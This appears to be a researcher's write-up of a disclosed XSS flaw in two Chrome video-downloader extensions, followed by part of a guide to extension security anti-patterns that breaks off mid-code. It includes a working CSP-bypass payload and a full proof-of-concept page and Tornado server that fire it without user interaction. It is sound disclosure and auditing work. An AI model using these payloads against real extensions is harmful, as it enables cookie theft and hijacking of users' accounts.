Note: This post is going to be a bit different from the previous Chrome extension vulnerability writeups. I’m going to actually walk through the code along with you to show you how tracing through an extension generally works. For this reason the whole thing is a bit lengthy.

While scanning various Chrome extensions with tarnish, I found that the popular Chrome extensions Video Downloader for Chrome version 5.0.0.12 (8.2 million users) and Video Downloader Plus (7.3 million users) suffer from a Cross-site Scripting (XSS) vulnerability in their browser action page. All that is required to exploit these extensions is for a victim to navigate to an attacker-controlled page.

This vulnerability is caused by the use of string concatenation to build HTML which is dynamically appended to the DOM via jQuery. An attacker can craft a specialized link which will cause arbitrary JavaScript execution in the context of the extension. Using this exploit, an attacker can abuse the following permissions which the extension has access to:

"permissions": [
    "alarms",
    "contextMenus",
    "privacy",
    "storage",
    "cookies",
    "tabs",
    "unlimitedStorage",
    "webNavigation",
    "webRequest",
    "webRequestBlocking",
    "http://*/*",
    "https://*/*",
    "notifications"
],

Using the above permissions, an attacker is able to dump all browser cookies, intercept all browser requests, and communicate with all sites as the authenticated user. It’s about as powerful as an extension gets.

The Vulnerability

The core of this vulnerability is the following piece of code:

vd.createDownloadSection = function(videoData) {
    return '<li class="video"> \
        <a class="play-button" href="' + videoData.url + '" target="_blank"></a> \
        <div class="title" title="' + videoData.fileName + '">' + videoData.fileName + '</div> \
        <a class="download-button" href="' + videoData.url + '" data-file-name="' + videoData.fileName + videoData.extension + '">Download - ' + Math.floor(videoData.size * 100 / 1024 / 1024) / 100 + ' MB</a>\
        <div class="sep"></div>\
        </li>';
};

This is a fairly textbook example of code vulnerable to Cross-site Scripting (XSS). The extension pulls these video links from our attacker-controlled page, so exploiting it should be straightforward. However, as is often the case with textbook examples, the real world situation is much more complicated. This post will walk through the speed bumps encountered along the way and demonstrate how they were bypassed. We’ll start with where our input is taken in, and follow it all the way to the final function.
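To make the breakout concrete, here is a trimmed, standalone reproduction of the concatenation pattern (a simplified copy for illustration, not the extension’s exact function), fed a hypothetical crafted url value:

```javascript
// Trimmed-down copy of the vulnerable concatenation pattern for illustration.
function createDownloadSection(videoData) {
    return '<li class="video">' +
        '<a class="play-button" href="' + videoData.url + '" target="_blank"></a>' +
        '<div class="title" title="' + videoData.fileName + '">' + videoData.fileName + '</div>' +
        '</li>';
}

// A url containing a double quote closes the href attribute early,
// letting the rest of the value inject arbitrary markup.
var html = createDownloadSection({
    url: 'https://"><img src=x onerror=alert(1)>.flv',
    fileName: 'video'
});

console.log(html.indexOf('<img src=x onerror=alert(1)>') !== -1); // true
```

In a context without a restrictive CSP, appending this string to the DOM would execute the injected handler; the CSP complications in this extension are covered later in the post.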

The Path to Victory

The extension makes use of a Content Script to collect possible video URLs from both page links (<a> tags), and videos (<video> tags). Content Scripts are JavaScript snippets which run on pages the user has visited in their browser (in this case, every page the user visits). The following code is taken from the extension’s Content Script:

vd.getVideoLinks = function(node) {
    // console.log(node);
    var videoLinks = [];
    $(node)
        .find('a')
        .each(function() {
            var link = $(this).attr('href');
            var videoType = vd.getVideoType(link);
            if (videoType) {
                videoLinks.push({
                    url: link,
                    fileName: vd.getLinkTitleFromNode($(this)),
                    extension: '.' + videoType
                });
            }
        });
    $(node)
        .find('video')
        .each(function() {
            // console.log(this);
            var nodes = [];
            // console.log($(this).attr('src'));
            $(this).attr('src') ? nodes.push($(this)) : void 0;
            // console.log(nodes);
            $(this)
                .find('source')
                .each(function() {
                    nodes.push($(this));
                });
            nodes.forEach(function(node) {
                var link = node.attr('src');
                if (!link) {
                    return;
                }
                var videoType = vd.getVideoType(link);
                videoLinks.push({
                    url: link,
                    fileName: vd.getLinkTitleFromNode(node),
                    extension: '.' + videoType
                });
            });
        });
    return videoLinks;
};

As can be seen in the above code, the links and video elements are iterated over and the information is collected into the videoLinks array before being returned. The videoLinks element properties that we have control over are url (pulled from the href attribute), and fileName (pulled by getting the title attribute, alt attribute, or the node’s inner text).

This is called by the function vd.findVideoLinks:

vd.findVideoLinks = function(node) {
    var videoLinks = [];
    switch (window.location.host) {
        case 'vimeo.com':
            vd.sendVimeoVideoLinks();
            break;
        case 'www.youtube.com':
            break;
        default:
            videoLinks = vd.getVideoLinks(node);
    }
    vd.sendVideoLinks(videoLinks);
};

This call occurs at the beginning of the page load for every page:

vd.init = function() {
    vd.findVideoLinks(document.body);
};

vd.init();

Upon harvesting all of these links, the Content Script sends them to the extension’s background page via the function vd.sendVideoLinks. The following is the message listener declared in the extension’s background page:

chrome.runtime.onMessage.addListener(function(request, sender, sendResponse) {
    switch (request.message) {
        case 'add-video-links':
            if (typeof sender.tab === 'undefined') {
                break;
            }
            vd.addVideoLinks(request.videoLinks, sender.tab.id, sender.tab.url);
            break;
        case 'get-video-links':
            sendResponse(vd.getVideoLinksForTab(request.tabId));
            break;
        case 'download-video-link':
            vd.downloadVideoLink(request.url, request.fileName);
            break;
        case 'show-youtube-warning':
            vd.showYoutubeWarning();
            break;
        default:
            break;
    }
});

Our case is the add-video-links message; since our sender.tab is not undefined, vd.addVideoLinks is called with the video link data scraped earlier. The following is the code for addVideoLinks:

vd.addVideoLinks = function(videoLinks, tabId, tabUrl) {
	...trimmed for brevity...
    videoLinks.forEach(function(videoLink) {
        // console.log(videoLink);
        videoLink.fileName = vd.getFileName(videoLink.fileName);
        vd.addVideoLinkToTab(videoLink, tabId, tabUrl);
    });
};

The above code checks to see if it has already stored the link data for this tabId previously. If not, it creates a new object for doing so. The fileName attribute of each piece of link data is run through the vd.getFileName function, which has the following code:

vd.getFileName = function(str) {
    // console.log(str);
    var regex = /[A-Za-z0-9()_ -]/;
    var escapedStr = '';
    str = Array.from(str);
    str.forEach(function(char) {
        if (regex.test(char)) {
            escapedStr += char;
        }
    });
    return escapedStr;
};

The above function crushes our chances for obtaining DOM-XSS via the fileName attribute of the link data. It will strip out any characters which do not match the regex [A-Za-z0-9()_ -], sadly including characters like " which could be used to break out of the attribute in the concatenated HTML.
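The filter is easy to verify standalone; running a copy of the function over a breakout attempt shows every dangerous character being stripped:

```javascript
// Standalone copy of the extension's fileName filter.
var getFileName = function(str) {
    var regex = /[A-Za-z0-9()_ -]/;
    var escapedStr = '';
    Array.from(str).forEach(function(char) {
        // Only alphanumerics, parens, underscores, spaces and hyphens survive.
        if (regex.test(char)) {
            escapedStr += char;
        }
    });
    return escapedStr;
};

console.log(getFileName('"><script>alert(1)</script>')); // "scriptalert(1)script"
```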

This leaves us with just the url property, so let’s continue on.

The videoLink is sent to the vd.addVideoLinkToTab function, which is the following:

vd.addVideoLinkToTab = function(videoLink, tabId, tabUrl) {
	...trimmed for brevity...
    if (!videoLink.size) {
        console.log('Getting size from server for ' + videoLink.url);
        vd.getVideoDataFromServer(videoLink.url, function(videoData) {
            videoLink.size = videoData.size;
            vd.addVideoLinkToTabFinalStep(tabId, videoLink);
        });
    } else {
        vd.addVideoLinkToTabFinalStep(tabId, videoLink);
    }
};

The script checks to see if the link data has a size property (which it won’t). When size is not set, it gets the size of the file at the link location via vd.getVideoDataFromServer:

vd.getVideoDataFromServer = function(url, callback) {
    var request = new XMLHttpRequest();
    request.onreadystatechange = function() {
        if (request.readyState === 2) {
            callback({
                mime: this.getResponseHeader('Content-Type'),
                size: this.getResponseHeader('Content-Length')
            });
            request.abort();
        }
    };
    request.open('Get', url);
    request.send();
};

The above code simply fires an XMLHttpRequest to grab the headers for the file at the specified link and pulls the Content-Type and Content-Length headers. This data is returned, and the value of the Content-Length header is used to set the size property of the videoLinks element. After this is done the result is passed to vd.addVideoLinkToTabFinalStep:

vd.addVideoLinkToTabFinalStep = function(tabId, videoLink) {
    // console.log("Trying to add url "+ videoLink.url);
    if (!vd.isVideoLinkAlreadyAdded(
            vd.tabsData[tabId].videoLinks,
            videoLink.url
        ) &&
        videoLink.size > 1024 &&
        vd.isVideoUrl(videoLink.url)
    ) {
        vd.tabsData[tabId].videoLinks.push(videoLink);
        vd.updateExtensionIcon(tabId);
    }
};

Here we start to encounter a number of snags. We want the URL to be appended to the vd.tabsData[tabId].videoLinks array but this will only happen if we pass the following conditional:

!vd.isVideoLinkAlreadyAdded(
    vd.tabsData[tabId].videoLinks,
    videoLink.url
) &&
videoLink.size > 1024 &&
vd.isVideoUrl(videoLink.url)

vd.isVideoLinkAlreadyAdded is a simple check to see if the URL has already been recorded in the vd.tabsData[tabId].videoLinks array. The second check is that videoLink.size is larger than 1024. Recall that this value is taken from the retrieved Content-Length header. In order to pass this check, we stand up a basic Python Tornado server with a wildcard route that returns a large enough response:

...trimmed for brevity...
def make_app():
    return tornado.web.Application([
        ...trimmed for brevity...
        (r"/.*", WildcardHandler),
    ])

...trimmed for brevity...
class WildcardHandler(tornado.web.RequestHandler):
    def get(self):
        self.set_header("Content-Type", "video/x-flv")
        self.write( ("A" * 2048 ) )
...trimmed for brevity...

Now that we’ve wildcarded that route, no matter what our crafted link is, it will always route to a page which returns more than 1024 bytes. This solves this check for us.

The next check requires that the vd.isVideoUrl function return true. The code for that function is the following:

vd.videoFormats = {
    mp4: {
        type: 'mp4'
    },
    flv: {
        type: 'flv'
    },
    mov: {
        type: 'mov'
    },
    webm: {
        type: 'webm'
    }
};

vd.isVideoUrl = function(url) {
    var isVideoUrl = false;
    Object.keys(vd.videoFormats).some(function(format) {
        if (url.indexOf(format) != -1) {
            isVideoUrl = true;
            return true;
        }
    });
    return isVideoUrl;
};

This check is fairly straightforward. It simply checks to ensure that either mp4, flv, mov or webm is contained in the URL. We can easily get around this check by just appending a .flv to the end of our url payload.
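Running a standalone copy of the check confirms the bypass (attacker.example below is a placeholder domain):

```javascript
// Standalone copy of the extension's URL check (format objects trimmed).
var videoFormats = { mp4: {}, flv: {}, mov: {}, webm: {} };

var isVideoUrl = function(url) {
    var isVideo = false;
    Object.keys(videoFormats).some(function(format) {
        // Naive substring match - no parsing of the actual file extension.
        if (url.indexOf(format) != -1) {
            isVideo = true;
            return true;
        }
    });
    return isVideo;
};

console.log(isVideoUrl('https://attacker.example/payload'));      // false
console.log(isVideoUrl('https://attacker.example/payload.flv'));  // true
```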

Since we’ve successfully met all the requirements for the conditional, our url is appended to the vd.tabsData[tabId].videoLinks array.

Moving over to the original popup.js script which contained the core vulnerable function shown above, we see the following:

$(document).ready(function() {
    var videoList = $("#video-list");
    chrome.tabs.query({
        active: true,
        currentWindow: true
    }, function(tabs) {
        console.log(tabs);
        vd.sendMessage({
            message: 'get-video-links',
            tabId: tabs[0].id
        }, function(tabsData) {
            console.log(tabsData);
            if (tabsData.url.indexOf('youtube.com') != -1) {
                vd.sendMessage({
                    message: 'show-youtube-warning'
                });
                return
            }
            var videoLinks = tabsData.videoLinks;
            console.log(videoLinks);
            if (videoLinks.length == 0) {
                $("#no-video-found").css('display', 'block');
                videoList.css('display', 'none');
                return
            }
            $("#no-video-found").css('display', 'none');
            videoList.css('display', 'block');
            videoLinks.forEach(function(videoLink) {
                videoList.append(vd.createDownloadSection(videoLink));
            })
        });
    });
    $('body').on('click', '.download-button', function(e) {
        e.preventDefault();
        vd.sendMessage({
            message: 'download-video-link',
            url: $(this).attr('href'),
            fileName: $(this).attr('data-file-name')
        });
    });
});

The above code fires when the extension’s browser icon is clicked on. The extension queries the Chrome extension API for the current tab’s metadata. The ID of this tab is taken from the metadata and the get-video-links call is sent to the background page. The code for this is just sendResponse(vd.getVideoLinksForTab(request.tabId)); which returns the video link data we discussed above.

The video links are iterated over and each one is passed to the vd.createDownloadSection function shown at the beginning of this post. This does HTML concatenation to build a large string which is appended to the DOM using jQuery’s .append() function. Passing raw HTML with user input to append() is a classic example of Cross-site Scripting (XSS).
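As an aside, the standard fix for this pattern is to escape untrusted values before concatenation (or, better, to build elements via the DOM and set untrusted data with .text()/.attr()). The following is a minimal escaping sketch written for illustration, not the patched extension’s actual code:

```javascript
// Minimal HTML-escaping helper (illustrative, not the extension's fix).
function escapeHtml(value) {
    return String(value)
        .replace(/&/g, '&amp;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;')
        .replace(/'/g, '&#39;');
}

var untrusted = 'https://"><img src=x onerror=alert(1)>.flv';
var escaped = escapeHtml(untrusted);

// The quote and angle brackets become inert entity references.
console.log(escaped); // https://&quot;&gt;&lt;img src=x onerror=alert(1)&gt;.flv
```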

It seems we can get our payload to the vulnerable function relatively unscathed! However it’s too early to celebrate. We have another speed-bump to overcome: Content Security Policy (CSP).

Content Security Policy

Interestingly enough, the Content Security Policy for this extension does not have unsafe-eval in its script-src directive. The following is an excerpt from the extension:

script-src 'self' https://www.google-analytics.com https://ssl.google-analytics.com https://apis.google.com https://ajax.googleapis.com; style-src 'self' 'unsafe-inline' 'unsafe-eval'; connect-src *; object-src 'self'

From the above Content Security Policy (CSP) we can see the script-src is the following:

script-src 'self' https://www.google-analytics.com https://ssl.google-analytics.com https://apis.google.com https://ajax.googleapis.com

This policy prevents us from sourcing scripts from arbitrary websites, and forbids us from doing inline JavaScript declaration (e.g. <script>alert('XSS')</script>). The only way we can execute JavaScript is by sourcing from one of the following sites:

  • https://www.google-analytics.com
  • https://ssl.google-analytics.com
  • https://apis.google.com
  • https://ajax.googleapis.com

When you’re looking to bypass a CSP policy, seeing both https://apis.google.com and https://ajax.googleapis.com in the script-src directive is very good news. These sites host many JavaScript libraries, as well as JSONP endpoints; both are useful in bypassing Content Security Policy.

Note: If you’re ever looking to check if a site is a bad source to add to a CSP, check out the CSP Evaluator Tool made by some pretty smart Googlers (shoutout to @we1x specifically).

For some prior art in this space, the H5SC Minichallenge 3: "Sh*t, it's CSP!" was a contest where contestants had to achieve XSS on a page which only whitelisted ajax.googleapis.com. This challenge is remarkably similar to the situation we face now.

One of the more clever solutions in that contest was the following payload:

"ng-app ng-csp><base href=//ajax.googleapis.com/ajax/libs/><script src=angularjs/1.0.1/angular.js></script><script src=prototype/1.7.2.0/prototype.js></script>\{\{$on.curry.call().alert(1337

To quote the contest runner on the solution:

This submission is very interesting as it abuses an effect from combining Prototype.js with AngularJS. AngularJS quite successfully prohibits access to window using its integrated sandbox. Yet, Prototype.JS extends functions with the curry property, that upon being called with call() returns a window object - without AngularJS noticing. This means, we can use Prototype.JS to get hands on window and execute almost arbitrary methods of that object.

The white-listed Google-CDN provides both outdated AngularJS versions as well as Prototype.JS - giving us access to what we need to operate on window as we like it. It requires no user interaction to work.

By modifying this payload we can exploit this extension as well. The following is a payload which uses this same technique to execute alert('XSS in Video Downloader for Chrome by mandatory'):

"ng-app ng-csp><script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.0.1/angular.js></script><script src=https://ajax.googleapis.com/ajax/libs/prototype/1.7.2.0/prototype.js></script>\{\{$on.curry.call().alert('XSS in Video Downloader for Chrome by mandatory')\}\}<!--

The following image demonstrates our payload firing upon clicking the extension’s icon:

We now have arbitrary JavaScript execution in the context of the extension and can abuse any Chrome extension API the extension has access to. However, it does require a user to click the extension icon while on our malicious page. It’s best not to convey weakness when building exploits, so we’ll try to make this require no user interaction.

Going back to the manifest.json, we can see that the web_accessible_resources directive has been set to the following:

"web_accessible_resources": [
    "*"
]

This use of just a wildcard means that any webpage can <iframe> or otherwise source any resource contained in the extension. In our case, the resource we want to include is the popup.html page, which is normally only shown when the user clicks the extension’s icon. By iframing this page along with our previous payload, we have an exploit that requires no user interaction:

The final payload being the following:

<!DOCTYPE html>
<html>
<body>
    <a href="https://&#x22;ng-app ng-csp&#x3E;&#x3C;script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.0.1/angular.js&#x3E;&#x3C;/script&#x3E;&#x3C;script src=https://ajax.googleapis.com/ajax/libs/prototype/1.7.2.0/prototype.js&#x3E;&#x3C;/script&#x3E;\{\{$on.curry.call().alert(&#x27;XSS in Video Downloader for Chrome by mandatory&#x27;)\}\}&#x3C;!--.flv">test</a>

    <iframe src="about:blank" id="poc"></iframe>

    <script>
    setTimeout(function() {
        document.getElementById( "poc" ).setAttribute( "src", "chrome-extension://dcfofgiombegngbaofkeebiipcdgpnga/html/popup.html" );
    }, 1000);
    </script>
</body>
</html>

This works in two parts: the first part sets the videoLinks array for the current tab; the second fires after one second and points the iframe at chrome-extension://dcfofgiombegngbaofkeebiipcdgpnga/html/popup.html (the popup page). The final proof of concept (Python webserver and all) is the following:

import tornado.ioloop
import tornado.web

class MainHandler(tornado.web.RequestHandler):
    def get(self):
        self.write("""
<!DOCTYPE html>
<html>
<body>
    <a href="https://&#x22;ng-app ng-csp&#x3E;&#x3C;script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.0.1/angular.js&#x3E;&#x3C;/script&#x3E;&#x3C;script src=https://ajax.googleapis.com/ajax/libs/prototype/1.7.2.0/prototype.js&#x3E;&#x3C;/script&#x3E;\{\{$on.curry.call().alert(&#x27;XSS in Video Downloader for Chrome by mandatory&#x27;)\}\}&#x3C;!--.flv">test</a>

    <iframe src="about:blank" id="poc"></iframe>

    <script>
    setTimeout(function() {
        document.getElementById( "poc" ).setAttribute( "src", "chrome-extension://dcfofgiombegngbaofkeebiipcdgpnga/html/popup.html" );
    }, 1000);
    </script>
</body>
</html>
        """)

class WildcardHandler(tornado.web.RequestHandler):
    def get(self):
        self.set_header("Content-Type", "video/x-flv")
        self.write( ("A" * 2048 ) )

def make_app():
    return tornado.web.Application([
        (r"/", MainHandler),
        (r"/.*", WildcardHandler),
    ])

if __name__ == "__main__":
    app = make_app()
    app.listen(8888)
    tornado.ioloop.IOLoop.current().start()

Disclosure & Remediation

Since there was no obvious way to contact either extension owner (minimal contact details on their respective Chrome extension pages), I reached out to some folks who work on Chrome extension security at Google. They appropriately notified the extension owners and worked to get a fix in place. The latest versions of both extensions should no longer be vulnerable to the issues described here. This post has also waited out the time for everyone with the extension to automatically update, so everyone should be patched!

That’s All Folks

If you have any questions or comments feel free to reach out to me on Twitter. If you’d like to find some Chrome extension vulnerabilities yourself try out the scanner I built tarnish which should help you get started (source code here). If you’re looking for a good intro to Chrome extension security, check out “Kicking the Rims – A Guide for Securely Writing and Auditing Chrome Extensions”.

-mandatory

A Thin Layer of Chrome Extension Security Prior-Art

Chrome extension security and methodologies for auditing Chrome extensions for vulnerabilities appears to be a topic with shockingly little prior art, especially when compared to other platforms such as Electron, which has seen considerably more security research. Searching the internet for guides and tools for auditing Chrome extensions yields very little: an academic paper describing Chrome’s extension security model and a 2013 blog post on an example of XSS in an intentionally-vulnerable extension. Other results appear to be out of date, such as this Chrome extension fingerprinting guide, which no longer works for new Chrome extensions.

Of course, it’s not as if security issues in Chrome extensions haven’t been found or are particularly rare. One big example was the case of a Cross-site Scripting (XSS) vulnerability in the Reddit Enhancement Suite (RES) extension that allowed for wormable exploitation. For a good summary of that vulnerability, see this write up on it; the extension had 1.5 million users at the time.

This example is not even a worst-case scenario, since that XSS was in a Content Script of the extension and not in a Background Page (this guide will dive into the differences). In short: vulnerabilities in Background Pages, the pages with access to all of the privileged extension APIs, are much worse than any regular XSS. They result in the ability to abuse any of the declared APIs of the extension, such as the ability to access all sites as the victim, modify browser bookmarks, history, and more. For example, the Steam Inventory Helper extension suffered from a vulnerability that resulted in arbitrary JavaScript execution in the Background Page context, giving an attacker the ability to hijack all of the victim’s accounts on every website they were authenticated to.

Given the incredible popularity of the Chrome browser and its extensions, it seems that this platform is definitely deserving of a closer look into the security pitfalls that can occur. This guide attempts to outline extension security anti-patterns, as well as provide a usable service (tarnish) to aid developers and security researchers in auditing Chrome extensions.

Before diving into security anti-patterns in Chrome extensions, it’s important to get an understanding of how exactly these extensions are structured. To be upfront and explicit: the developers behind Chrome have put a lot of thought into extension security and insecure anti-patterns. Their architecture makes this very clear, as I’ll discuss below, and much of it is designed around the core idea of making an environment where developers cannot easily shoot themselves in the foot. In an age where we have platforms such as Electron and NW.js, which seem intent on taking the systemic issue of Cross-site Scripting (XSS) to the desktop and turning it into Remote Code Execution (RCE) without any safeguards, Chrome’s extension environment is a solid foundation on an otherwise shaky landscape. Chrome extensions don’t even have the ability to execute arbitrary system commands, yet Chrome still takes extreme care to ensure that a developer has a hard time doing the wrong thing.

Isolated But Talkative Worlds

A Quick Disclaimer

This section gets fairly into the weeds of how Chrome extensions operate. If you’re already familiar with this, you can skip straight to the “Stealing from the Stainless, Security Anti-Patterns in the Extension World” section. Even if you already develop Chrome extensions, reading this section is likely still useful as a refresher.

Home is Where the manifest.json Is – The Basic Extension Layout

The file structure of a Chrome extension is actually very simple. A Chrome extension is essentially just a zip folder with a file extension of .crx. The core of the extension is a manifest.json file in the root of the folder which specifies the layout, permissions, and other configuration options. To be blunt, understanding the manifest.json format is critical for auditing extensions for security vulnerabilities. All paths of the extension are relative to the base location where the manifest.json is located. So if you have an image in the root named example.jpg, it would be located at chrome-extension://[EXTENSION_ID]/example.jpg (the extension ID is derived from the extension’s public key: the first 128 bits of its SHA256 hash, hex-encoded with the digits 0-f shifted to the letters a-p).

The Extension Architecture, Namespace Isolation and the DOM

The design of how Chrome extensions work makes a large difference in how they can be exploited. Much of this is actually outlined in the academic paper I linked to earlier, but I’ll dive into it here as well since the paper is a bit dated.

The Chrome extension layout can be best shown when it’s visualized:

webpage-dom-chrome-seperation

The above diagram shows the different parts of a Chrome extension. Each colored box is a separate JavaScript variable namespace. Separate variable namespaces mean that if you declared a variable in JavaScript like the following:

var test = 2;

This variable would be accessible only from its own context (the different colored boxes cannot directly access each other’s variables). If this were a variable in the Background Page, for example, it would not be accessible from the Content Script or the web page. The same goes for variables declared by the Content Script: they cannot be accessed by either the Background Page or the web page itself. This sandboxing prevents a rogue web page from interfering with the running Content Script(s) or the extension’s Background Page, since it cannot access or change any of their variables or functions.

The Same Origin Policy (SOP) in the Chrome Extension World

This separation makes a lot of sense when you also understand how the Same Origin Policy applies to Chrome extensions. Each Chrome extension has its own origin, which has the following format:

chrome-extension://[32_CHAR_EXTENSION_ID]

This means that any resource that falls under this origin can be accessed by the Chrome extension API. This origin structure makes sense because all of a Chrome extension’s resources live inside of the chrome-extension://[32_CHAR_EXTENSION_ID]/ directory. This applies to Background Pages and Browser Action pages; all of these execute within the chrome-extension://[32_CHAR_EXTENSION_ID] origin. Take the following example:

chrome-extension://[32_CHAR_EXTENSION_ID]/index.html
chrome-extension://[32_CHAR_EXTENSION_ID]/example.html

Both of these pages could access both the DOM and the JavaScript namespaces of each other because they have the same origin. Note that such access occurs via an iframe’s contentWindow or window.opener. The variable namespace of each Background Page is not shared with the others in any global sort of way (except in the case of multiple Background Page scripts, which just end up getting globbed into a single Background Page at runtime). You can view and debug a Background Page by enabling Developer Mode in Chrome.

Content Scripts work a little differently: they operate in the origin of the web page they are scoped for. So if you have a Content Script running on https://example.com, its effective origin is https://example.com. This means it can do things like interact with https://example.com’s DOM, add event listeners, and perform XMLHttpRequests to retrieve web pages for this origin. However, it cannot modify the DOM of the corresponding extension’s Background Page, because those are different origins. That being said, the Content Script does have slightly more privileges than the page, with the ability to message the Background Page and call some limited Chrome extension APIs. This is a bit of a strange setup because it feels much like your Content Script and your web page are running in separate “pages” due to the namespace isolation, even though they still share a DOM. To view and debug a Content Script in Chrome, pop open the Chrome Developer Tools via Options > More Tools > Developer Tools. Once the developer tools are shown, click on the “Sources” tab and then the “Content Scripts” sub-tab. Here you can see the running Content Scripts for your various extensions and set breakpoints to monitor the execution flow:

developer-console

Much of my time auditing a Chrome extension is spent in the Chrome developer panel seen above, setting breakpoints and following the execution.

Crossing the Barriers with Injection and Message Passing

However, despite the separation of namespaces, there is still plenty of room for the Chrome extension to do its work. For example, say the Content Script needs to retrieve the value of a variable defined in the web page’s namespace. While it cannot access the web page’s namespace directly, it can access the web page’s DOM and inject a new script tag (<script>) into it. This injected script then executes in the web page’s namespace and has access to its variables. Upon retrieving the variable, the injected script can pass the value back to the Content Script via postMessage(). This is what is shown by having the Content Script and the web page inside the parent “Web page DOM” box: both have access to the web page’s DOM but not to each other’s namespace. The following illustration demonstrates the flow of grabbing a variable from the web page and passing it back to the Content Script:

message-passing-example

One of the most important things to understand in the Chrome extension auditing process is how these isolated worlds work together. The answer is (mainly) via message passing. In Chrome extensions there are a few different ways to pass messages around, such as chrome.runtime.sendMessage() for messaging the Background Page from Content Script(s), or window.addEventListener() for receiving messages passed from web pages to Content Script(s). From a security perspective, whenever a message is passed from a lower-privileged context to a higher-privileged context (for example, a message from a Content Script to the Background Page), there exists a possible avenue for exploitation via unexpected input. It’s also important to ensure that messaging is scoped properly so as not to send sensitive data to unintended origins. In the case of postMessage(), this means not using a wildcard “*” as the target origin, since any webpage with a reference to the window could potentially listen in.
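As a sketch of that scoping advice (my own illustration, modeled as a plain function so the logic can run outside a browser), a message handler should verify the sender’s origin before trusting the data:

```javascript
// Hypothetical origin-checked message handler; in a real page this
// would be wired up via window.addEventListener('message', handler).
function makeMessageHandler(trustedOrigin, onMessage) {
    return function (event) {
        // Refuse anything not sent from the origin we expect.
        if (event.origin !== trustedOrigin) {
            return null;
        }
        return onMessage(event.data);
    };
}

const handler = makeMessageHandler('https://example.com', data => 'accepted: ' + data);

console.log(handler({ origin: 'https://example.com', data: 'hi' }));  // 'accepted: hi'
console.log(handler({ origin: 'https://evil.example', data: 'hi' })); // null
```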

Web Accessible Resources & Navigation Blocking

As if the namespace isolation was not enough, there is another layer of protection around Chrome extension resources. Files in a Chrome extension, by default, are not able to be iframed, sourced, or otherwise included into regular web pages on the Internet. So https://example.com could not iframe chrome-extension://pflahkdjlekaeehbenhpkpipgkbbdbbo/test.html for example. However, Chrome’s extension API does allow you to loosen this restriction by declaring these resources via the web_accessible_resources directive in the extension’s manifest. This is useful in cases where you want to allow a regular web page to include JavaScript, images, or other resources from your extension. The downside to this from a security perspective is that any HTML pages that are set with this flag can now be attacked via clickjacking, passing malicious input into location.hash, unexpected messaging via postMessage(), or by iframing and running background pages in an unexpected order. For this reason it is generally dangerous for developers to wildcard a large number of their resources with this directive. Additionally, if a Chrome extension exposes any resources via this directive, an arbitrary web page on the Internet can use these sourceable resources to fingerprint that a user is running a particular extension. This has plenty of uses both in exploitation and in general web tracking.

Background Pages and Content Security Policy

The background page is the most privileged of the various worlds, as it has the ability to call all of the Chrome extension APIs declared in the extension’s manifest. These APIs are the core of what makes extensions powerful, enabling things like managing cookies, bookmarks, history, downloads, proxy settings, etc. Given the powerful nature of these pages, Chrome requires that developers declare a Content Security Policy (CSP) with certain minimal requirements. The Chrome extension documentation states the policy is the following by default:

script-src 'self'; object-src 'self'

That’s effectively true, though to be pedantic it’s worth mentioning the default policy is actually the following (you can verify this yourself using the Network panel of Chrome’s developer tools):

script-src 'self' blob: filesystem: chrome-extension-resource:; object-src 'self' blob: filesystem:;

The above policy is slightly more lax to allow for some general JavaScript operations, such as creating blob: URIs and interacting with the filesystem. Of course, developers often see this default policy and are annoyed by just how strict it is. This annoyance often results in developers attempting to loosen the CSP as much as possible just to “have it work”. The Chrome team foresaw this danger and added additional requirements to prevent developers from making their CSP too loose. For this reason there is no way to allow the ‘unsafe-inline’ source in a Chrome extension CSP (save for <script>s with nonces). This means that a developer can never make use of inline JavaScript execution similar to the following:

Name: <input onfocus="example()" name="test" />
…
<a href="javascript:example()">Click to start</a>
…
<script>alert("Welcome!")</script>

While this can be painful to developers who are used to this style of web development, its security advantages cannot be overstated. In doing this, Chrome has made it much harder for developers to write Cross-site Scripting (XSS) vulnerabilities into their Background Pages. In my experience auditing quite a few Chrome extensions, this has often been the only mitigating factor in an otherwise completely exploitable vulnerability. Additionally, this requirement often forces developers to write their extensions in a cleaner way, since they have to separate their views from their core logic.

However, you can still make many of the other common mistakes you see with CSP. Developers can (and often do) add ‘unsafe-eval’ to their CSP, and often whitelist entire CDNs and other sources that anyone can upload scripts to and source them from. These choices often allow attackers to bypass all of the protections the CSP provides.
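As a hypothetical example of how this goes wrong, a loosened policy like the following reintroduces eval()-based execution and whitelists a large public CDN:

```
script-src 'self' 'unsafe-eval' https://cdnjs.cloudflare.com; object-src 'self'
```

With a large public CDN whitelisted, an attacker who finds an injection point can source known “gadget” scripts hosted there (such as older AngularJS builds) to execute arbitrary code despite the CSP, and ‘unsafe-eval’ widens the blast radius of any string that reaches eval().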

Stealing from the Stainless, Security Anti-Patterns in the Extension World

Content Scripts Obey No Man…or CSP

With all of the talk around Content Security Policy (CSP) requirements for Background Pages, one might get the idea that Cross-site Scripting (XSS) is dead in Chrome extensions. This is not at all the case; the risk has simply shifted over to the Content Script side of the extension. Content Scripts do not have to obey the CSP declared for the extension, and they also don’t have to obey the CSP of the web page they’re executing under (unless they inject a <script> into the web page’s DOM). So if https://example.com has a CSP of the following:

script-src 'self'; object-src 'self'

This is completely irrelevant to JavaScript executing in the Content Script context. It can, for example, make use of eval() all it wants, despite eval() being forbidden by the CSP of the page whose origin it runs in. This very often translates into developers creating Chrome extensions with Content Scripts that introduce new vulnerabilities into popular websites which would otherwise be safe. The RES XSS vulnerability mentioned earlier is a great example of this occurring. Despite Reddit itself not having a Cross-site Scripting (XSS) vulnerability, RES introduced one into the site for those with the extension installed. It did this by taking a user-controllable image title and unsafely injecting it back as HTML into Reddit’s web page DOM. The result was that Reddit was vulnerable to a zero-click XSS for all users of the RES extension.

When studying this reality, an anti-pattern begins to emerge. Developers writing Content Scripts have a strong chance of shooting themselves (and their users) in the foot if they perform unsafe DOM operations using user-controlled input. Extension developers should take extreme care to ensure they are not passing user-controlled input into sinks such as innerHTML, jQuery’s html(), or href attributes (javascript: URIs), to name a few examples.
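When markup genuinely must be built from user input, the input should be contextually escaped first. The helper below is a hypothetical sketch (the function name is made up); in most cases assigning via textContent and avoiding HTML-building entirely is simpler and safer:

```javascript
// Hypothetical helper: escape the significant HTML metacharacters before any
// user-controlled string is ever concatenated into markup.
function escape_html( untrusted_input ) {
    return String( untrusted_input )
        .replace( /&/g, "&amp;" )
        .replace( /</g, "&lt;" )
        .replace( />/g, "&gt;" )
        .replace( /"/g, "&quot;" )
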